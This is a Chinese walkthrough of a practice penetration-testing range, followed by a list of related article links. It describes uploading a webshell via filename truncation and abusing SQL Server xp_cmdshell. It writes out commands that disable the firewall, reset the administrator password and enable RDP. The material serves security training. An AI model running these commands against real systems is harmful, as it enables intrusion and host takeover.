信息收集

扫描端口,知道目标ip,扫描目标ip开启了多少端口,(1-65535) 扫描出下面端口

从扫描出的端口中27689是web端口 ,看页面源代码,看是否有提示以及开发语言。

扫27689端口的目录,用什么语言开发就用什么语言字典扫描,DIR.txt、MDB.txt 不管什么语言都要勾选

访问http://10.168.1.103:27689/web.config.bak目录下载了文件,从里面得到了sql数据库账号密码Id=down;pwd=downsql

使用nacicat premium连接数据库,输入账号密码连接sql数据库

登录数据库后,每个表都去看看是否有key,在user表中找到账号密码

使用账号密码登录网页后拿到第一个key

网站里面有文件上传功能,使用burp抓包上传一句话木马

文件名过长会被系统截取包括系统时间在内的前32位字符作为文件名,挨着试文件名长度刚好截断到asp后缀

如何找到上传的文件所在目录,使用burp抓包点击文件,然后修改文件名,然后再放包,浏览器因为找不到文件会报错。

通过报错目录访问上传的一句话木马页面

使用御剑连接web服务器后在文件中找到key2

使用sqlserver提权,找到sql最高权限账号(sa)密码

使用Navicat premium登录SqlServer最高权限调用sa权限调用administrator权限

连接后点查询新建查询USE master查询数据库

通过sqlserver命令去开启xp_cmdshell
USE masterRECONFIGUREEXEC sp_configure 'show advanced options',1 --启用xp_cmdshellRECONFIGUREEXEC sp_configure 'xp_cmdshell',1  --打开xp_cmdshell,可以调用SQL系统之外的命令RECONFIGURE

使用cmd命令查询现在权限为system,提权成功

关闭目标主机防火墙---- exec xp_cmdshell"netsh firewall set opmode disable"

把目标主机administrator密码改成123456 ----exec xp_cmdshell"net user administrator 123456"

查看目标是否开启3389端口----exec xp_cmdshell'netstat -ant | find "3389"'

使用御剑将3389.bat上传到D:/web目录

执行3389.bat文件开启3389端口----exec xp_cmdshell “D:\web\3389.bat”

再次查询是否开启3389端口,已开启就使用mstsc连接----exec xp_cmdshell'netstat -ant | find "3389"'

使用mstsc连接到靶机拿到key3

渗透综合靶场---SqlServer提权相关推荐

  1. SQLserver提权

    SQLserver提权 利用xp_cmdshell,在默认情况下xp_cmdshell禁用,是sa权限时不一定要拿到webshell利用 还是先看配置文件(一般配置文件都是与config相关) 查看当 ...

  2. 基于Ha-Joker靶场的完整渗透测试演示直至提权(root)

    信息收集 ┌──(root㉿kali)-[~] └─# arp-scan -l # 通过ARP-scan进行快速的主机发现, 如下图我们猜测10.10.10.138可能是目标主机 ┌──(root㉿k ...

  3. 2021-06-03web渗透学习之mof提权(MySQL 漏洞利用与提权)(转自国大佬)

    自从接触安全以来就 MySQL 的 UDF 提权.MOF 提权耳熟能详,但是貌似国光我一直都没有单独总结过这些零散的姿势点,所以本文就诞生了,再解决自己以前的困扰之余,也希望本文可以帮助到其他网友. ...

  4. web安全渗透之钓鱼网站提权

    本实验实现1:要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接 ...

  5. sqlserver提权失败_利用mssql模拟登录提权

    0x01 前提 开发者有时为了满足某种需求,允许其他登录用户模拟高权限的用户,对于开发来说,一个再简单不过的功能.虽然严格意义上这不算个漏洞,但是这种配置不当一般可以用来提权. 0x02 复现 1.s ...

  6. 网站ftp服务器漏洞利用,网站入侵渗透综合分析和FTP提权得系统权限

    当我们想入侵检测一个网站拿后台/webshell 后想进一步获得网站的服务器管理权限. 小残在这里为大家介绍下一下思路 第一个思路:啊D+GOOGLE找注入点 PS:可以通过直接在网站查看动态界面 类 ...

  7. [内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)

    简介 CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取域管访问权限(将域控中保存在AD ...

  8. sqlserver提权失败_mssql提权遇到CreateProcess' 失败,错误代码: '5'。

    方法一: mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法. 微软ms sql 2000/2005 注入时exec xp_cmdshel ...

  9. 张小白的渗透之路(十一)--windows提权详解

    windows基础命令 systeminfo | findstr OS **#获取系统版本信息** hostname **#获取主机名称** whomai /priv **#显示当前用户的安全特权** ...

最新文章

  1. VMware下桥接设置
  2. C及C++中typedef的简单使用指南
  3. Java和JavaScript区别与联系
  4. 欧几里德与扩展欧几里德算法——密码学笔记(五)
  5. DVRRDK, EZSDK和DVSDK这三者有什么区别
  6. php 框架 路由解析,来!狂撸一款PHP现代化框架 (路由的设计)
  7. java设计把两个字符串的值交换 而不使用中间变量
  8. 一个企业为什么执行不力?
  9. 安卓手机小说阅读器_粉笔免费小说阅读器app下载-粉笔免费小说阅读器手机版下载v1.0.1...
  10. 一个简单T9输入法的实现
  11. 华为 荣耀 6x android哪个版本,华为荣耀畅玩6X官方rom刷机包_华为荣耀6X原版系统包_升级包...
  12. __stack_chk_fail之栈帧溢出检测技术
  13. 【CH01】创建、初始化SpringBoot项目与项目git管理
  14. 图片识别项目 是商品包装识别分类
  15. Ajax——同步请求与异步请求
  16. Visual Studio 6/2005/2008/2010/2012/2013 各版本编译器 下载
  17. iOS---学习研究大牛Git高星项目YYCategories(四)
  18. bootstrap开发的新闻网站
  19. 开发过程中的小问题,马克一下算是记一遍了。
  20. SCOI2016 Day2 简要题解

热门文章

  1. SSD1306 OLED 驱动
  2. 07 情商上来了-自卑也能出奇迹
  3. Hive in exists 区别
  4. 如何备考一次通过PMP项目管理认证考试?
  5. 有一种记忆叫光荣——感人的老兵退伍留言集
  6. 凉拌菜谱家常菜做法-拌胡萝卜丝
  7. unable to access ‘https://sys-gitlab.n.com.cn/IPSC/web/Bumblebee/platform.w/platform.git/‘: SSL cert
  8. CMU 15-213 CSAPP (Ch5~Ch7)
  9. SyntaxError: Unexpected end of JSON input (file: C:\Users\admin\Desktop\...)
  10. 计算机学院校运会解说词,大学运动会方阵解说词